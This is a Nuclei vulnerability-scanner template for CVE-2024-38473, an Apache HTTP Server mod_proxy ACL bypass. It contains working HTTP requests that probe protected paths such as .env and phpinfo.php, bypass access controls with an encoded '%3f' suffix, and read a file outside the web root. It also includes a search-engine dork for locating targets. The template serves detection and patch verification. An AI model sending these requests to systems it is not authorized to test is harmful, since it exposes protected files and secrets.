id: CVE-2024-38473

info:
  name: Apache HTTP Server - ACL Bypass
  author: pdteam
  severity: high
  description: |
    Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.
  impact: |
    Authenticated attackers can bypass ACL restrictions by crafting requests with incorrect encoding, potentially accessing protected backend services or resources that should be restricted by authentication mechanisms.
  remediation: |
    Upgrade to Apache HTTP Server version 2.4.60 or later.
  reference:
    - https://blog.orange.tw/2024/08/confusion-attacks-en.html#%E2%9A%94%EF%B8%8F-Primitive-1-2-ACL-Bypass
    - https://www.cvedetails.com/cve/CVE-2024-38473/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-38473
    - https://httpd.apache.org/security/vulnerabilities_24.html
    - https://security.netapp.com/advisory/ntap-20240712-0001/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 8.1
    cve-id: CVE-2024-38473
    cwe-id: CWE-116
    epss-score: 0.88359
    epss-percentile: 0.99514
    cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*,cpe:2.3:a:apache:httpd:*:*:*:*:*:*:*:*
  metadata:
    max-request: 10
    vendor: Apache Software Foundation
    product: Apache HTTP Server
    google-query: intitle:"Apache HTTP Server" inurl:"/server-status"
  tags: cve,cve2024,apache,acl-bypass,mod_proxy,php-fpm,vuln

# Request 2 only runs if request 1 found a protected path; request 3 runs independently.
flow: |
  http(1) && http(2)
  http(3)

http:
  # Path normalization ACL bypass
  # Step 1: locate a resource the server currently protects (401/403).
  # The matcher is internal, so this request alone never reports a finding.
  - method: GET
    path:
      - "{{BaseURL}}/{{files}}"
    payloads:
      files:
        - admin.php
        - adminer.php
        - xmlrpc.php
        - .env
        - php-info.php
        - php_info.php
        - phpinfo.php
        - info.php
        - bin/cron.php
        - cache/index.tpl.php
        - cpanel.php
    stop-at-first-match: true
    matchers:
      - type: status
        status:
          - 403
          - 401
        internal: true

  # Step 2: re-request the same protected path with an encoded "?" suffix;
  # a 200 here means the ACL that produced the 401/403 was bypassed.
  - method: GET
    path:
      - "{{BaseURL}}/{{http_1_files}}%3ftest.php"
    matchers:
      - type: status
        status:
          - 200

  # docroot confusion
  # A filesystem file outside the web root served back confirms the confusion.
  - method: GET
    path:
      - "{{BaseURL}}/html/usr/share/doc/hostname/copyright%3f"
    matchers:
      - type: word
        words:
          - "On Debian systems, the complete text of the GNU General Public License"
          - "This package was written by Peter Tobias"
        condition: and
# digest: 4b0a00483046022100f1e55fbd4d9713d0a3ae568473a29343e26c042bc251abfd641567c60450fab1022100928b96099e98923217e1dcf3d9781a8dfef12d62663eb72002f18bdfc5fa5759:922c64590222798bb761d5b6d8e72950